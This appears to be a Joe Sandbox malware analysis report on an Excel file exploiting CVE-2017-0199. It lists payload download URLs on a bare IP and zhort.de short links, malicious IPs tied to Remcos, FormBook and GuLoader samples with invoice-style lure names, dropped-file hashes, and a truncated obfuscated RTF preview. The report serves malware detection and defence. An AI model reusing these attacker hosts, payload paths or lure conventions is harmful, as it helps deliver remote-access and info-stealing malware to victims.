http://nuget.org/NuGet.exe | powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://crl.entrust.net/server1.crl0 | powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/8/nrrV73987.js | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.imvu.com | RegAsm.exe, RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000011.00000002.446215352.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://198.12.81.228 | powershell.exe, 0000000C.00000002.438679378.000000000247A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/ | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.imvu.com/NK | RegAsm.exe, 00000011.00000002.445337578.000000000033C000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.msn.com/ | bhvA42C.tmp.15.dr | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549 | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
https://zhort.de/UlEYs1f | SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx | false | Avira URL Cloud: safe | unknown
http://cdn.at.atwola.com/_media/uac/msn.html | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
https://www.google.com/accounts/servicelogin | RegAsm.exe | false | Avira URL Cloud: safe | unknown
http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIFj | EQNEDT32.EXE, 00000008.00000002.422455144.000000000060F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIFc | EQNEDT32.EXE, 00000008.00000002.422455144.000000000060F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://policies.yahoo.com/w3c/p3p.xml | bhvA42C.tmp.15.dr | false | URL Reputation: safe | unknown
https://zhort.de/UlEYs1yX | ~DF12645870096F092E.TMP.0.dr, F9430000.0.dr | false | Avira URL Cloud: safe | unknown
https://zhort.de/ | zhort.de.url.3.dr | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.msn.com/advertisement.ad.js | bhvA42C.tmp.15.dr | false | Avira URL Cloud: safe | unknown
http://www.ebuddy.com | RegAsm.exe, RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
207.241.232.154 | ia803104.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | true
198.12.81.228 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
88.99.66.38 | zhort.de | Germany | 24940 | HETZNER-ASDE | true
192.3.101.172 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1500777
                        Start date and time:2024-08-28 22:28:08 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 11m 4s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:19
                        Number of new started drivers analysed:1
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • GSI enabled (VBA)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx
                        Detection:MAL
                        Classification:mal100.phis.troj.spyw.expl.evad.winXLSX@19/30@10/5
                        EGA Information:
                        • Successful, ratio: 71.4%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 170
                        • Number of non-executed functions: 330
                        Cookbook Comments:
                        • Found application associated with file extension: .xlsx
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        • Override analysis time to 56123.7434258316 for current running targets taking high CPU consumption
                        • Override analysis time to 112247.486851663 for current running targets taking high CPU consumption
                        • Override analysis time to 224494.973703326 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 3096 because there are no executed function
                        • Execution Graph export aborted for target powershell.exe, PID 3308 because it is empty
• Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx
Time | Type | Description
16:29:31 | API Interceptor | 38x Sleep call for process: EQNEDT32.EXE modified
16:29:32 | API Interceptor | 6x Sleep call for process: wscript.exe modified
16:29:33 | API Interceptor | 85x Sleep call for process: powershell.exe modified
16:29:41 | API Interceptor | 8340561x Sleep call for process: RegAsm.exe modified
Input: URL: Office document, Model: jbxai
Output:
{
  "brand": ["AVM", "Microsoft Office"],
  "contains_trigger_text": false,
  "prominent_button_name": "unknown",
  "text_input_field_labels": ["unknown"],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
Match | Associated Sample Name / URL | Detection | Threat Name | Context
207.241.232.154 | August Shipment - Inv No. 041.xls | malicious | Remcos | -
207.241.232.154 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtf | malicious | Remcos | -
207.241.232.154 | PO_304234.xls | malicious | Remcos | -
207.241.232.154 | RFQ No. 109078906v.xla.xlsx | malicious | Remcos | -
207.241.232.154 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | malicious | Remcos | -
207.241.232.154 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | malicious | Remcos | -
207.241.232.154 | another.rtf | malicious | Remcos | -
207.241.232.154 | Faktura.vbs | malicious | Remcos | -
207.241.232.154 | M12_20240821.xls | malicious | Remcos | -
207.241.232.154 | PO_20931.xls | malicious | Remcos | -
88.99.66.38 | SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsx | malicious | FormBook | -
88.99.66.38 | Thermo Fisher RFQ_TFS-1805.xls | malicious | GuLoader | -
88.99.66.38 | PO_304234.xls | malicious | Remcos | -
88.99.66.38 | RFQ No. 109078906v.xla.xlsx | malicious | Remcos | -
88.99.66.38 | M12_20240821.xls | malicious | Remcos | -
88.99.66.38 | PO_20931.xls | malicious | Remcos | -
88.99.66.38 | 350.xls | malicious | FormBook | -
88.99.66.38 | PO082724.xls | malicious | Remcos | -
88.99.66.38 | SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx | malicious | Unknown | -
88.99.66.38 | SWIFT COPY.xls | malicious | Remcos | -
192.3.101.172 | Inv 30532.xls | malicious | Remcos | -
192.3.101.172 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.2547.11280.rtf | malicious | Remcos | -
192.3.101.172 | SecuriteInfo.com.Trojan.DownLoader47.28778.10975.2985.exe | malicious | Remcos | -
192.3.101.172 | WIRE RECEIPT.xls | malicious | Remcos | -
192.3.101.172 | PO-05034.xls | malicious | Remcos | -
192.3.101.172 | SecuriteInfo.com.Win32.MalwareX-gen.15358.5163.exe | malicious | StormKitty, SugarDump, XWorm | -
192.3.101.172 | Payment copy.xls | malicious | StormKitty, SugarDump, XWorm | -
178.237.33.50 | PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat | malicious | FormBook, GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | August Shipment - Inv No. 041.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtf | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PO_304234.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | RFQ No. 109078906v.xla.xlsx | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | another.rtf | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | rnr.exe | malicious | Remcos | geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
zhort.de | SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsx | malicious | FormBook | 88.99.66.38
zhort.de | Thermo Fisher RFQ_TFS-1805.xls | malicious | GuLoader | 88.99.66.38
zhort.de | PO_304234.xls | malicious | Remcos | 88.99.66.38
zhort.de | RFQ No. 109078906v.xla.xlsx | malicious | Remcos | 88.99.66.38
zhort.de | M12_20240821.xls | malicious | Remcos | 88.99.66.38
zhort.de | PO_20931.xls | malicious | Remcos | 88.99.66.38
zhort.de | 350.xls | malicious | FormBook | 88.99.66.38
zhort.de | PO082724.xls | malicious | Remcos | 88.99.66.38
zhort.de | SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx | malicious | Unknown | 88.99.66.38
zhort.de | SWIFT COPY.xls | malicious | Remcos | 88.99.66.38
ia803104.us.archive.org | August Shipment - Inv No. 041.xls | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtf | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | PO_304234.xls | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | RFQ No. 109078906v.xla.xlsx | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | another.rtf | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | Faktura.vbs | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | M12_20240821.xls | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | PO_20931.xls | malicious | Remcos | 207.241.232.154
geoplugin.net | PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat | malicious | FormBook, GuLoader, Remcos | 178.237.33.50
geoplugin.net | August Shipment - Inv No. 041.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | PO_304234.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | RFQ No. 109078906v.xla.xlsx | malicious | Remcos | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | another.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | rnr.exe | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | http://conrasty.pro/rd/4GZfNu661Wcuf128ryymsulvqg219KJAPMAHPZPNXNLR15619WARW973R13 | malicious | Phisher | 172.245.174.190
AS-COLOCROSSINGUS | http://conrasty.pro/rd/4GZfNu661Wcuf128ryymsulvqg219KJAPMAHPZPNXNLR15619WARW973R13 | malicious | Phisher | 172.245.174.190
AS-COLOCROSSINGUS | Thermo Fisher RFQ_TFS-1805.xls | malicious | GuLoader | 192.3.243.166
AS-COLOCROSSINGUS | Bukti-Transfer.vbs | malicious | Snake Keylogger, VIP Keylogger | 192.210.215.11
AS-COLOCROSSINGUS | PO_304234.xls | malicious | Remcos | 192.3.193.155
AS-COLOCROSSINGUS | RFQ No. 109078906v.xla.xlsx | malicious | Remcos | 107.172.31.21
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | malicious | Remcos | 107.172.31.21
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | malicious | Remcos | 198.46.178.181
AS-COLOCROSSINGUS | another.rtf | malicious | Remcos | 198.46.178.137
AS-COLOCROSSINGUS | RFQ No. 109078906.xla.xlsx | malicious | Unknown | 192.210.214.138
INTERNET-ARCHIVEUS | August Shipment - Inv No. 041.xls | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtf | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | PO_304234.xls | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | RFQ No. 109078906v.xla.xlsx | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | another.rtf | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | Faktura.vbs | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | M12_20240821.xls | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | PO_20931.xls | malicious | Remcos | 207.241.232.154
HETZNER-ASDE | file.exe | malicious | LummaC, Vidar | 94.130.188.148
HETZNER-ASDE | file.exe | malicious | LummaC, Vidar | 94.130.188.148
HETZNER-ASDE | file.exe | malicious | LummaC, Vidar | 94.130.188.148
HETZNER-ASDE | file.exe | malicious | LummaC, Stealc, Vidar | 94.130.188.148
HETZNER-ASDE | file.exe | malicious | LummaC, Vidar | 94.130.188.148
HETZNER-ASDE | SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsx | malicious | FormBook | 88.99.66.38
HETZNER-ASDE | Thermo Fisher RFQ_TFS-1805.xls | malicious | GuLoader | 88.99.66.38
HETZNER-ASDE | PO_304234.xls | malicious | Remcos | 88.99.66.38
HETZNER-ASDE | RFQ No. 109078906v.xla.xlsx | malicious | Remcos | 88.99.66.38
HETZNER-ASDE | ZKB - Zahlungsbest#U00e4tigung an 20240828.pdf.exe | malicious | Quasar | 195.201.57.90
Match | Associated Sample Name / URL | Detection | Threat Name | Context
05af1f5ca1b87cc9cc9b25185115607d | August Shipment - Inv No. 041.xls | malicious | Remcos | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtf | malicious | Remcos | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | PO_304234.xls | malicious | Remcos | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | RFQ No. 109078906v.xla.xlsx | malicious | Remcos | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | malicious | Remcos | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | malicious | Remcos | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | another.rtf | malicious | Remcos | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | M12_20240821.xls | malicious | Remcos | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | PO_20931.xls | malicious | Remcos | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | 350.xls | malicious | FormBook | 88.99.66.38, 207.241.232.154
7dcce5b76c8b17472d024758970a406b | August Shipment - Inv No. 041.xls | malicious | Unknown | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | August Shipment - Inv No. 041.xls | malicious | Unknown | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsx | malicious | FormBook | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | August Shipment - Inv No. 041.xls | malicious | Remcos | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | Thermo Fisher RFQ_TFS-1805.xls | malicious | GuLoader | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | PO_304234.xls | malicious | Remcos | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | RFQ No. 109078906v.xla.xlsx | malicious | Remcos | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | RFQ No. 109078906.xla.xlsx | malicious | Unknown | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | M12_20240821.xls | malicious | Remcos | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | RFQ No. 109078906.xla.xlsx | malicious | Unknown | 88.99.66.38
                                                                              No context
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):0.025614997046743235
                                                                              Encrypted:false
                                                                              SSDEEP:6:I3DPcqVGu1HvxggLRhJarvLods/tRXv//4tfnRujlw//+GtluJ/eRuj:I3DPpVfRVOLodyvYg3J/
                                                                              MD5:A7F9B7669680B4F3BA36FA307C3EE266
                                                                              SHA1:747309F4C224F46B0404BD9AEE2343F35E5E6310
                                                                              SHA-256:800AB282135663481B06A86016FB2FF44293FAE5C1F3DA4C9854947812344A3A
                                                                              SHA-512:4625C3B54046DE23DF71838E0535A91263F21044B2056CC0067A3DB8898405B725DABFA1B84AD52FE332C3DE1F6A31DA92398F891FFF1FDAAE4A2B24EE18849D
                                                                              Malicious:false
                                                                              Preview:......M.eFy...z.r..m,.M...P=.. S,...X.F...Fa.q..............................<}.,-B..`.y.............^.y.J....:.QW.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4760
                                                                              Entropy (8bit):4.834060479684549
                                                                              Encrypted:false
                                                                              SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                              MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                              SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                              SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                              SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                              Malicious:false
                                                                              Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):0.34726597513537405
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlll:Nll
                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                              Malicious:false
                                                                              Preview:@...e...........................................................
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):962
                                                                              Entropy (8bit):5.012309356796613
                                                                              Encrypted:false
                                                                              SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                                                                              MD5:14B479958E659C5A4480548A393022AC
                                                                              SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                                                                              SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                                                                              SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                                                                              Malicious:false
                                                                              Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Rich Text Format data, version 1
                                                                              Category:dropped
                                                                              Size (bytes):95554
                                                                              Entropy (8bit):2.4672808402513553
                                                                              Encrypted:false
                                                                              SSDEEP:384:zEDp6mlYSqtsRb8mS+UVfcUlut9OYkFtTVv2BChgc/:zEDp6mqSoY8r7iQu3OYeJeBoN/
                                                                              MD5:F3E730B297901499D743DE5C1DFF1E7D
                                                                              SHA1:B04E1B970316693C05C918B9F087F43FBA243246
                                                                              SHA-256:20863835BFE7B5FBEC9E7AFD08461C711E70AB2BFA9758521744FFE27CE06568
                                                                              SHA-512:801553EF4433D81C074CCFAF8A3C67D868F65AA6709E06730F2C8CF7C23CF4DF264E38E631B239BA853216F8D5987C3F7A469364ACEC5F277B44FBB48CAFCB50
                                                                              Malicious:true
                                                                              Yara Hits:
• Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Preview:{\rtf1.......{\*\wzScriptIdAttr272630091 \[}.{\473008866,)?949=0..?&;??~~4[%/|7@'.4156;).?||:;~%><;|<-72[2!?6.^=+;=1.?53>$%|*!%@]]7%>8#('@.;883?(7`5?0%84?%9?%7~;&38.[0!5`)^%:=?>%`?..2?')1`?+?-?,]9.`&5/]&?])<.?:+=&.`&^.%#8>02*(8.+^0.!)7`.11%1/.9<?%._'0.6.?%.~=%`<($1>_>>$3?')_.%2<=&*^$?~[6'5|~|>.?;,_=..0+(9.!68^;2/???`5?2$]9?@:1=^$/]/`_]|+6^%+9%/.(>5%]=8][?94-272%$:_`~!.=3?###-:?.<+?.1?.?<~2|<.9=%>%`=7?,?8??_|+._=.67.*@].-.3<??.8.747$|...[]3^~2@!&@@%?8_49@^?(8?2?^5.'??2,8#1.[-79@;!;9/'?-:2([-.+|`:8_*#?.*=377&]!4.&9?.?0@5%7%7.3;1*6<.'<#!)@)%5]%^~,07-;>%8._7?!02]?]>.|+&)?87-|%<9.$@.>84,<%[].??&?-.^70?>8&>744|8.8#?;'3||/)415`.;[@30';;;*.(.169=.<`$[/=._@~.??.#??(<6#3(.'?%`~8$$_>)'7-$.94?_*)~]'@9_2=8).1.`(|?#`.<_?450.`3(?.'/.0=#;87????)0*##[.~?.`3,.:<&7#.54!9-/_!([?5-^!#.??=,3|^7/|5?,,74?=_%[?(9,-@;]/.7?*)$(|2;|'.2:?2.31,_%?.!/?._230?660^?*??9??*?*~'^~&.`:(.9#(%_$*#^?1_()>'[']`<:#-%|04,8.;#@:.@[~=.']959#),[%[-7-;5,?=00~)[(2?.3/@0@_?:>63'&.$/.(<,3&+>:&(226!<#2-%.$;!|:[%[!0<@'>+?#%&<./'=?%!/?8=
                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):182970
                                                                              Entropy (8bit):3.8053382344283673
                                                                              Encrypted:false
                                                                              SSDEEP:3072:JOEWBwVroEh21gt5pIGw/tS7tKxXnQhp85POf8DyVG:QE3roEh2sUXO85uyyQ
                                                                              MD5:E4D3D857EA66D66052DB0FA95DEC7FEA
                                                                              SHA1:3A16FC72C17FBD808F86FA9F5661A35165CD3B23
                                                                              SHA-256:3DA9CF3BD94658AE0D6C78C441C3146DD1348D7AA8EE084BBAD0B987BC138E46
                                                                              SHA-512:077C4CE61FE80C17E025354BE67916A15423B1A795A0B591D111E0911ED0B5D4BA4C62E770EC130AC48BC5D2D38EE516D312054972FAD4936828A04D019FE00D
                                                                              Malicious:false
